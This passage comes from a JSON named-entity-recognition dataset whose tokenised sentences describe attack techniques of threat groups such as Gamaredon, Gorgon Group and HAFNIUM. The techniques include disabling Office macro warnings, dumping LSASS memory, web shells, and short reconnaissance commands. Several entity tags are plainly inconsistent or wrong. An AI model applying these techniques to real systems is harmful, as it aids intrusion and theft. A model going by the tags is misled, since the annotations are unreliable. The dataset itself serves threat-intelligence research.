"O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "used", - "<code>hidcon</code>", - "to", - "run", - "batch", - "files", - "in", - "a", - "hidden", - "console", - "window." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "downloaded", - "additional", - "malware", - "and", - "tools", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "left", - "taunting", - "images", - "and", - "messages", - "on", - "the", - "victims'", - "desktops", - "as", - "proof", - "of", - "system", - "access." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "used", - "an", - "Outlook", - "VBA", - "module", - "on", - "infected", - "systems", - "to", - "send", - "phishing", - "emails", - "with", - "malicious", - "attachments", - "to", - "other", - "employees", - "within", - "the", - "organization." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "tested", - "connectivity", - "between", - "a", - "compromised", - "machine", - "and", - "a", - "C2", - "server", - "using", - "Ping", - "with", - "commands", - "such", - "as", - "`CSIDL_SYSTEM\\cmd.exe", - "/c", - "ping", - "-n", - "1`." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "attempted", - "to", - "get", - "users", - "to", - "click", - "on", - "Office", - "attachments", - "with", - "malicious", - "macros", - "embedded." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "used", - "legitimate", - "process", - "names", - "to", - "hide", - "malware", - "including", - "<code>svchosst</code>." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "removed", - "security", - "settings", - "for", - "VBA", - "macro", - "execution", - "by", - "changing", - "registry", - "values", - "<code>HKCU\\Software\\Microsoft\\Office\\<version>\\<product>\\Security\\VBAWarnings</code>", - "and", - "<code>HKCU\\Software\\Microsoft\\Office\\<version>\\<product>\\Security\\AccessVBOM</code>." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "used", - "`mshta.exe`", - "to", - "execute", - "malicious", - "HTA", - "files." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "malware", - "has", - "used", - "<code>CreateProcess</code>", - "to", - "launch", - "additional", - "malicious", - "components." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "delivered", - "self-extracting", - "7z", - "archive", - "files", - "within", - "malicious", - "document", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "inserted", - "malicious", - "macros", - "into", - "existing", - "documents,", - "providing", - "persistence", - "when", - "they", - "are", - "reopened.", - "Gamaredon", - "Group", - "has", - "loaded", - "the", - "group's", - "previously", - "delivered", - "VBA", - "project", - "by", - "relaunching", - "Microsoft", - "Outlook", - "with", - "the", - "<code>/altvba</code>", - "option,", - "once", - "the", - "Application.Startup", - "event", - "is", - "received." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "I-OffAct", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "tools", - "have", - "contained", - "an", - "application", - "to", - "check", - "performance", - "of", - "USB", - "flash", - "drives.", - "Gamaredon", - "Group", - "has", - "also", - "used", - "malware", - "to", - "scan", - "for", - "removable", - "drives." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "used", - "obfuscated", - "PowerShell", - "scripts", - "for", - "staging." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "used", - "tools", - "to", - "enumerate", - "processes", - "on", - "target", - "hosts", - "including", - "Process", - "Explorer." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "tools", - "have", - "registered", - "Run", - "keys", - "in", - "the", - "registry", - "to", - "give", - "malicious", - "VBS", - "files", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "malware", - "has", - "used", - "rundll32", - "to", - "launch", - "additional", - "malicious", - "components." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "created", - "scheduled", - "tasks", - "to", - "launch", - "executables", - "after", - "a", - "designated", - "number", - "of", - "minutes", - "have", - "passed." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group's", - "malware", - "can", - "take", - "screenshots", - "of", - "the", - "compromised", - "computer", - "every", - "minute." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "delivered", - "spearphishing", - "emails", - "with", - "malicious", - "attachments", - "to", - "targets." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Gamaredon", - "Group", - "file", - "stealer", - "can", - "gather", - "the", - "victim's", - "computer", - "name", - "and", - "drive", - "serial", - "numbers", - "to", - "send", - "to", - "a", - "C2", - "server." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Gamaredon", - "Group", - "file", - "stealer", - "can", - "gather", - "the", - "victim's", - "username", - "to", - "send", - "to", - "a", - "C2", - "server." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "injected", - "malicious", - "macros", - "into", - "all", - "Word", - "and", - "Excel", - "documents", - "on", - "mapped", - "network", - "drives." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "I-Way", - "B-Purp", - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "used", - "DOCX", - "files", - "to", - "download", - "malicious", - "DOT", - "document", - "templates", - "and", - "has", - "used", - "RTF", - "template", - "injection", - "to", - "download", - "malicious", - "payloads.", - "Gamaredon", - "Group", - "can", - "also", - "inject", - "malicious", - "macros", - "or", - "remote", - "templates", - "into", - "documents", - "already", - "present", - "on", - "compromised", - "systems." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "registered", - "domains", - "to", - "stage", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "used", - "VNC", - "tools,", - "including", - "UltraVNC,", - "to", - "remotely", - "interact", - "with", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "embedded", - "malicious", - "macros", - "in", - "document", - "templates,", - "which", - "executed", - "VBScript.", - "Gamaredon", - "Group", - "has", - "also", - "delivered", - "Microsoft", - "Outlook", - "VBA", - "projects", - "with", - "embedded", - "macros." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "used", - "HTTP", - "and", - "HTTPS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "used", - "GitHub", - "repositories", - "for", - "downloaders", - "which", - "will", - "be", - "obtained", - "by", - "the", - "group's", - ".NET", - "executable", - "on", - "the", - "compromised", - "system." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "used", - "various", - "batch", - "scripts", - "to", - "establish", - "C2", - "and", - "download", - "additional", - "files.", - "Gamaredon", - "Group's", - "backdoor", - "malware", - "has", - "also", - "been", - "written", - "to", - "a", - "batch", - "file." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "used", - "WMI", - "to", - "execute", - "scripts", - "used", - "for", - "discovery." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gorgon", - "Group", - "malware", - "can", - "decode", - "contents", - "from", - "a", - "payload", - "that", - "was", - "Base64", - "encoded", - "and", - "write", - "the", - "contents", - "to", - "a", - "file." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gorgon", - "Group", - "malware", - "can", - "attempt", - "to", - "disable", - "security", - "features", - "in", - "Microsoft", - "Office", - "and", - "Windows", - "Defender", - "using", - "the", - "<code>taskkill</code>", - "command." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Gorgon", - "Group", - "has", - "used", - "<code>-W", - "Hidden</code>", - "to", - "conceal", - "PowerShell", - "windows", - "by", - "setting", - "the", - "WindowStyle", - "parameter", - "to", - "hidden." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gorgon", - "Group", - "malware", - "can", - "download", - "additional", - "files", - "from", - "C2", - "servers." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gorgon", - "Group", - "attempted", - "to", - "get", - "users", - "to", - "launch", - "malicious", - "Microsoft", - "Office", - "attachments", - "delivered", - "via", - "spearphishing", - "emails." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Gorgon", - "Group", - "malware", - "can", - "deactivate", - "security", - "mechanisms", - "in", - "Microsoft", - "Office", - "by", - "editing", - "several", - "keys", - "and", - "values", - "under", - "<code>HKCU\\Software\\Microsoft\\Office\\</code>." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gorgon", - "Group", - "malware", - "can", - "leverage", - "the", - "Windows", - "API", - "call,", - "CreateProcessA(),", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gorgon", - "Group", - "malware", - "can", - "download", - "a", - "remote", - "access", - "tool,", - "ShiftyBug,", - "and", - "inject", - "into", - "another", - "process." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-Tool", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gorgon", - "Group", - "malware", - "can", - "use", - "PowerShell", - "commands", - "to", - "download", - "and", - "execute", - "a", - "payload", - "and", - "open", - "a", - "decoy", - "document", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gorgon", - "Group", - "malware", - "can", - "use", - "process", - "hollowing", - "to", - "inject", - "one", - "of", - "its", - "trojans", - "into", - "another", - "process." - ], - "ner_tags": [ - "B-Idus", - "I-HackOrg", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gorgon", - "Group", - "malware", - "can", - "create", - "a", - ".lnk", - "file", - "and", - "add", - "a", - "Registry", - "Run", - "key", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-Tool", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gorgon", - "Group", - "malware", - "can", - "create", - "a", - ".lnk", - "file", - "and", - "add", - "a", - "Registry", - "Run", - "key", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-Tool", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gorgon", - "Group", - "sent", - "emails", - "to", - "victims", - "with", - "malicious", - "Microsoft", - "Office", - "documents", - "attached." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Gorgon", - "Group", - "has", - "obtained", - "and", - "used", - "tools", - "such", - "as", - "QuasarRAT", - "and", - "Remcos." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Gorgon", - "Group", - "has", - "used", - "macros", - "in", - "Spearphishing", - "Attachments", - "as", - "well", - "as", - "executed", - "VBScripts", - "on", - "victim", - "machines." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gorgon", - "Group", - "malware", - "can", - "use", - "cmd.exe", - "to", - "download", - "and", - "execute", - "payloads", - "and", - "to", - "execute", - "commands", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Group5", - "disguised", - "its", - "malicious", - "binaries", - "with", - "several", - "layers", - "of", - "obfuscation,", - "including", - "encrypting", - "the", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Malware", - "used", - "by", - "Group5", - "is", - "capable", - "of", - "remotely", - "deleting", - "files", - "from", - "victims." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Malware", - "used", - "by", - "Group5", - "is", - "capable", - "of", - "capturing", - "keystrokes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Malware", - "used", - "by", - "Group5", - "is", - "capable", - "of", - "watching", - "the", - "victim's", - "screen." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "granted", - "privileges", - "to", - "domain", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "used", - "7-Zip", - "and", - "WinRAR", - "to", - "compress", - "stolen", - "files", - "for", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "interacted", - "with", - "Office", - "365", - "tenants", - "to", - "gather", - "details", - "regarding", - "target's", - "environments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Org", - "I-Org", - "I-Org", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "collected", - "data", - "and", - "files", - "from", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "created", - "domain", - "accounts." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "collected", - "e-mail", - "addresses", - "for", - "users", - "they", - "intended", - "to", - "target." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "exfiltrated", - "data", - "to", - "file", - "sharing", - "sites,", - "including", - "MEGA." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Area" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "exploited", - "CVE-2021-44228", - "in", - "Log4j", - "and", - "CVE-2021-26855,", - "CVE-2021-26857,", - "CVE-2021-26858,", - "and", - "CVE-2021-27065", - "to", - "compromise", - "on-premises", - "versions", - "of", - "Microsoft", - "Exchange", - "Server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "B-Features", - "B-Features", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "searched", - "file", - "contents", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "gathered", - "the", - "fully", - "qualified", - "domain", - "names", - "(FQDNs)", - "for", - "targeted", - "Exchange", - "servers", - "in", - "the", - "victim's", - "environment." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "hidden", - "files", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "obtained", - "IP", - "addresses", - "for", - "publicly-accessible", - "Exchange", - "servers." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "downloaded", - "malware", - "and", - "tools--including", - "Nishang", - "and", - "PowerCat--onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "checked", - "for", - "network", - "connectivity", - "from", - "a", - "compromised", - "host", - "using", - "`ping`,", - "including", - "attempts", - "to", - "contact", - "`google[.]com`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "used", - "<code>procdump</code>", - "to", - "dump", - "the", - "LSASS", - "process", - "memory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "used", - "the", - "NT", - "AUTHORITY\\SYSTEM", - "account", - "to", - "create", - "files", - "on", - "Exchange", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "stolen", - "copies", - "of", - "the", - "Active", - "Directory", - "database", - "(NTDS.DIT)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "used", - "TCP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "used", - "the", - "Exchange", - "Power", - "Shell", - "module", - "<code>Set-OabVirtualDirectoryPowerShell</code>", - "to", - "export", - "mailbox", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "used", - "`tasklist`", - "to", - "enumerate", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "used", - "web", - "shells", - "to", - "export", - "mailbox", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "enumerated", - "domain", - "controllers", - "using", - "`net", - "group", - "\"Domain", - "computers\"`", - "and", - "`nltest", - "/dclist`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "used", - "<code>rundll32</code>", - "to", - "load", - "malicious", - "DLLs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "used", - "ASCII", - "encoding", - "for", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "collected", - "IP", - "information", - "via", - "IPInfo." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "used", - "`whoami`", - "to", - "gather", - "user", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "operated", - "from", - "leased", - "virtual", - "private", - "servers", - "(VPS)", - "in", - "the", - "United", - "States." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Area", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "used", - "open-source", - "C2", - "frameworks,", - "including", - "Covenant." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "acquired", - "web", - "services", - "for", - "use", - "in", - "C2", - "and", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "deployed", - "multiple", - "web", - "shells", - "on", - "compromised", - "servers", - "including", - "SIMPLESEESHARP,", - "SPORTSBALL,", - "China", - "Chopper,", - "and", - "ASPXSpy." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "I-Tool", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "HAFNIUM", - "has", - "used", - "`cmd.exe`", - "to", - "execute", - "commands", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "used", - "a", - "PowerShell-based", - "keylogging", - "tool", - "to", - "capture", - "the", - "window", - "title." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "used", - "cloud", - "services,", - "including", - "OneDrive,", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "HEXANE", - "has", - "used", - "brute", - "force", - "attacks", - "to", - "compromise", - "valid", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Org", - "I-OffAct", - "I-OffAct", - "O", - "I-Purp", - "I-Purp", - "O" - ] 